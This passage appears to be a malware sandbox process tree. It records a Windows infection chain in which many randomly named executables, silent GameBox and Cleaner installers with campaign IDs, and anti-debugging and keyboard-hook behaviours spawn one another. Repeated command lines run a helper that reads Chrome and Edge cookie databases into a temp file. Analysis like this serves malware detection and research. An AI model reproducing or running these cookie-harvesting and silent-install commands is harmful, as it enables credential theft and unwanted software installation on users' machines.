C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"C:\Users\Admin\Documents\HgzBkT4OEF98KK64yAd7oW8n.exe"13⤵PID:8856
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:6336
-
-
-
-
C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"12⤵PID:8040
-
C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"C:\Users\Admin\Documents\dIeDdD9ZCjp9iSF2mEDI1JuW.exe"13⤵PID:5500
-
-
-
C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe"C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe"12⤵PID:6300
-
C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe"C:\Users\Admin\Documents\uTh0geZ3Zfgu4p238N7gtr5n.exe" -q13⤵PID:6420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 82014⤵
- Program crash
PID:6592
-
-
-
-
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"12⤵PID:2012
-
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"13⤵PID:8820
-
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7436 -
C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"C:\Users\Admin\Documents\zKft2B0yzzw1v_cQH0E1P3ML.exe"15⤵PID:8304
-
-
-
-
-
C:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exe"C:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exe"12⤵PID:7392
-
C:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exeC:\Users\Admin\Documents\Hq4T9DUzyPCOMIx1wwP0bHpo.exe13⤵PID:9204
-
-
-
C:\Users\Admin\Documents\NlF_wpVwwBpBPuBDbqi1L2a9.exe"C:\Users\Admin\Documents\NlF_wpVwwBpBPuBDbqi1L2a9.exe"12⤵PID:972
-
-
C:\Users\Admin\Documents\F9QVY_KGotMX33Tl1bomCsrk.exe"C:\Users\Admin\Documents\F9QVY_KGotMX33Tl1bomCsrk.exe"12⤵PID:1032
-
-
C:\Users\Admin\Documents\kSVpEZsZrc6xemTzPEtUEh6Z.exe"C:\Users\Admin\Documents\kSVpEZsZrc6xemTzPEtUEh6Z.exe"12⤵PID:7748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7748 -s 28013⤵
- Program crash
PID:3036
-
-
-
C:\Users\Admin\Documents\eElh3Su0dPZa_3w1fjZFEThC.exe"C:\Users\Admin\Documents\eElh3Su0dPZa_3w1fjZFEThC.exe"12⤵
- Suspicious use of SetWindowsHookEx
PID:6764
-
-
C:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exe"C:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exe"12⤵PID:4560
-
C:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exeC:\Users\Admin\Documents\orlTPdntezZxn17bxIvb6pkT.exe13⤵PID:6060
-
-
-
C:\Users\Admin\Documents\2bF44xcr5OAcMGEVGthhnKfj.exe"C:\Users\Admin\Documents\2bF44xcr5OAcMGEVGthhnKfj.exe"12⤵PID:5660
-
-
C:\Users\Admin\Documents\REUMgzPPynNrDi1yQtiV9gj4.exe"C:\Users\Admin\Documents\REUMgzPPynNrDi1yQtiV9gj4.exe"12⤵PID:5904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 29613⤵
- Program crash
PID:8464
-
-
-
C:\Users\Admin\Documents\Tsmqh1CXm2mQo5pM5kyRfelS.exe"C:\Users\Admin\Documents\Tsmqh1CXm2mQo5pM5kyRfelS.exe"12⤵PID:6892
-
-
C:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exe"C:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exe"12⤵PID:5300
-
C:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exeC:\Users\Admin\Documents\jdhL2e7gb1rObzuAejUw076h.exe13⤵PID:9184
-
-
-
C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"12⤵PID:1300
-
C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"C:\Users\Admin\Documents\FNHAQbBbFV7fJDxfFbFKZ4ec.exe"13⤵PID:8212
-
-
-
C:\Users\Admin\Documents\UkappXwNt0b7f0k6M1h1zYmo.exe"C:\Users\Admin\Documents\UkappXwNt0b7f0k6M1h1zYmo.exe"12⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\is-BR9DF.tmp\UkappXwNt0b7f0k6M1h1zYmo.tmp"C:\Users\Admin\AppData\Local\Temp\is-BR9DF.tmp\UkappXwNt0b7f0k6M1h1zYmo.tmp" /SL5="$50260,138429,56832,C:\Users\Admin\Documents\UkappXwNt0b7f0k6M1h1zYmo.exe"13⤵PID:8344
-
C:\Users\Admin\AppData\Local\Temp\is-1NV3C.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1NV3C.tmp\Setup.exe" /Verysilent14⤵PID:8696
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"15⤵PID:8048
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /qn CAMPAIGN=""710"" " CAMPAIGN="710"16⤵PID:6584
-
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\41l1xsq0.3dr\5ea1d8d5ec348a51892bc3f5fed22413.exe & exit10⤵PID:7716
-
C:\Users\Admin\AppData\Local\Temp\41l1xsq0.3dr\5ea1d8d5ec348a51892bc3f5fed22413.exeC:\Users\Admin\AppData\Local\Temp\41l1xsq0.3dr\5ea1d8d5ec348a51892bc3f5fed22413.exe11⤵PID:1104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 27612⤵
- Program crash
PID:6748
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ia3umz0k.u0z\gcleaner.exe /mixfive & exit10⤵PID:6908
-
C:\Users\Admin\AppData\Local\Temp\ia3umz0k.u0z\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ia3umz0k.u0z\gcleaner.exe /mixfive11⤵PID:456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 27612⤵
- Program crash
PID:3608
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ek1yc44k.kxr\app.exe /8-2222 & exit10⤵PID:7104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:7016
-
-
C:\Users\Admin\AppData\Local\Temp\ek1yc44k.kxr\app.exeC:\Users\Admin\AppData\Local\Temp\ek1yc44k.kxr\app.exe /8-222211⤵PID:436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 27612⤵
- Program crash
PID:8220
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2gexgme.cxw\installer.exe /qn CAMPAIGN=654 & exit10⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:6036 -
C:\Users\Admin\AppData\Local\Temp\l2gexgme.cxw\installer.exeC:\Users\Admin\AppData\Local\Temp\l2gexgme.cxw\installer.exe /qn CAMPAIGN=65411⤵PID:7576
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5780 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q7⤵
- Suspicious use of SetWindowsHookEx
PID:4564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 8528⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:732
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
PID:5772
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
PID:5788
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:2236 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵PID:5756
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵PID:5548
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5836 -
C:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exe"C:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exe"7⤵
- Suspicious use of SetThreadContext
PID:6712 -
C:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exeC:\Users\Admin\Documents\D4nZnvKuGza1oWNPIEDPRme3.exe8⤵PID:6044
-
-
-
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6904 -
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"8⤵PID:5376
-
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"9⤵PID:7372
-
C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"C:\Users\Admin\Documents\gdyzXEj5P496unOqfk6hVDCG.exe"10⤵PID:1748
-
-
-
-
-
C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"7⤵
- Suspicious use of SetThreadContext
PID:6952 -
C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"C:\Users\Admin\Documents\J2UMrXJ_91PPJWQrvcPYy29P.exe"8⤵PID:5972
-
-
-
C:\Users\Admin\Documents\7s2ZdHDbdc7fmGBQwXncfSTe.exe"C:\Users\Admin\Documents\7s2ZdHDbdc7fmGBQwXncfSTe.exe"7⤵
- Suspicious use of SetWindowsHookEx
PID:6936 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Suspicious use of SetWindowsHookEx
PID:5048
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Suspicious use of SetWindowsHookEx
PID:7152
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5040
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:1504
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:8972
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:1064
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:4808
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7500
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:6280
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:132
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5356
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7212
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:6988
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:4052
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5464
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:8208
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:3104
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:3264
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:9180
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:7780
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:8048
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:1312
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:9172
-
-
-
C:\Users\Admin\Documents\8vOzvG7hvLT_vK9OBgVL_Ut5.exe"C:\Users\Admin\Documents\8vOzvG7hvLT_vK9OBgVL_Ut5.exe"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6928
-
-
C:\Users\Admin\Documents\vQ3rC0vqvYatBnp35VZuhjBv.exe"C:\Users\Admin\Documents\vQ3rC0vqvYatBnp35VZuhjBv.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6828
-
-
C:\Users\Admin\Documents\aoTKQWvv37TQbCovU1Z1MQvL.exe"C:\Users\Admin\Documents\aoTKQWvv37TQbCovU1Z1MQvL.exe"7⤵
- Suspicious use of SetWindowsHookEx
PID:6820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 3008⤵
- Program crash
PID:8068
-
-
-
C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"7⤵PID:6812
-
C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"C:\Users\Admin\Documents\9UKJv1TLGOvmu1y73QBdGQ8c.exe"8⤵PID:3408
-
-
-
C:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exe"C:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exe"7⤵
- Suspicious use of SetThreadContext
PID:6804 -
C:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exeC:\Users\Admin\Documents\5YwwMGWcE2RgT9bX6bjTmfpN.exe8⤵PID:7924
-
-
-
C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"7⤵PID:6796
-
C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"C:\Users\Admin\Documents\qn2fLFfsyhvD8HKB3M1mdDes.exe"8⤵PID:6432
-
-
-
C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6788 -
C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7108
-
-
-
C:\Users\Admin\Documents\RtAumixa8TXlF5V7YdDzWrks.exe"C:\Users\Admin\Documents\RtAumixa8TXlF5V7YdDzWrks.exe"7⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6780
-
-
C:\Users\Admin\Documents\Qk3JedfhJSY7CnSFAxcsEsFs.exe"C:\Users\Admin\Documents\Qk3JedfhJSY7CnSFAxcsEsFs.exe"7⤵PID:6772
-
-
C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe"C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe"7⤵PID:6764
-
C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe"C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe" -q8⤵
- Suspicious use of SetWindowsHookEx
PID:5876
-
-
-
C:\Users\Admin\Documents\ODbji71oMpnCbzuxDfn7cqTM.exe"C:\Users\Admin\Documents\ODbji71oMpnCbzuxDfn7cqTM.exe"7⤵PID:6756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7420
-
-
-
C:\Users\Admin\Documents\qER2dJVjQNgUwLeyC0GWXVOg.exe"C:\Users\Admin\Documents\qER2dJVjQNgUwLeyC0GWXVOg.exe"7⤵
- Suspicious use of SetWindowsHookEx
PID:6744
-
-
C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe"C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe"7⤵PID:6736
-
C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exeC:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe8⤵PID:7616
-
-
C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exeC:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe8⤵PID:2708
-
-
-
C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"7⤵PID:6688
-
C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"8⤵PID:4008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5084
-
-
-
-
C:\Users\Admin\Documents\AghY32d_C0IWsfHZSaAte2cz.exe"C:\Users\Admin\Documents\AghY32d_C0IWsfHZSaAte2cz.exe"7⤵
- Suspicious use of SetWindowsHookEx
PID:6680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 2968⤵
- Program crash
PID:7604
-
-
-
C:\Users\Admin\Documents\pI7K3ej8ROAeK0fJrpk5IPcD.exe"C:\Users\Admin\Documents\pI7K3ej8ROAeK0fJrpk5IPcD.exe"7⤵PID:6916
-
-
C:\Users\Admin\Documents\jzIaxuTRlgKRr5Wp2_W36BRZ.exe"C:\Users\Admin\Documents\jzIaxuTRlgKRr5Wp2_W36BRZ.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6416
-
-
C:\Users\Admin\Documents\JBnTnGQuA9WcctOzY5oGIag_.exe"C:\Users\Admin\Documents\JBnTnGQuA9WcctOzY5oGIag_.exe"7⤵PID:6336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 2448⤵
- Program crash
PID:4872
-
-
-
C:\Users\Admin\Documents\3h1qGZUEdprlXIwaFgWSdLLy.exe"C:\Users\Admin\Documents\3h1qGZUEdprlXIwaFgWSdLLy.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5336
-
-
C:\Users\Admin\Documents\mnF7cBF5FzrUArS0hjJ_P4Vj.exe"C:\Users\Admin\Documents\mnF7cBF5FzrUArS0hjJ_P4Vj.exe"7⤵
- Suspicious use of SetWindowsHookEx
PID:4908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2568⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7072
-
-
-
C:\Users\Admin\Documents\WE1nYf8UVHZ6KQrxi_PpfIcz.exe"C:\Users\Admin\Documents\WE1nYf8UVHZ6KQrxi_PpfIcz.exe"7⤵
- Suspicious use of SetWindowsHookEx
PID:6192
-
-
C:\Users\Admin\Documents\oA8ksUPGyLC_UzTW6PxDesM6.exe"C:\Users\Admin\Documents\oA8ksUPGyLC_UzTW6PxDesM6.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4868
-
-
C:\Users\Admin\Documents\KrKyPnVcJVoVzwCCDEV4Z4fX.exe"C:\Users\Admin\Documents\KrKyPnVcJVoVzwCCDEV4Z4fX.exe"7⤵PID:5776
-
-
C:\Users\Admin\Documents\wFPK9T1S973QSecHEhL32vPw.exe"C:\Users\Admin\Documents\wFPK9T1S973QSecHEhL32vPw.exe"7⤵PID:7152
-
-
C:\Users\Admin\Documents\fhvD868tqd9rKMZVwD3ag8Jk.exe"C:\Users\Admin\Documents\fhvD868tqd9rKMZVwD3ag8Jk.exe"7⤵
- Suspicious use of SetWindowsHookEx
PID:6384 -
C:\Users\Admin\AppData\Local\Temp\is-4GUII.tmp\fhvD868tqd9rKMZVwD3ag8Jk.tmp"C:\Users\Admin\AppData\Local\Temp\is-4GUII.tmp\fhvD868tqd9rKMZVwD3ag8Jk.tmp" /SL5="$203BC,138429,56832,C:\Users\Admin\Documents\fhvD868tqd9rKMZVwD3ag8Jk.exe"8⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:7528 -
C:\Users\Admin\AppData\Local\Temp\is-32RAF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-32RAF.tmp\Setup.exe" /Verysilent9⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7620 -
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2596 -
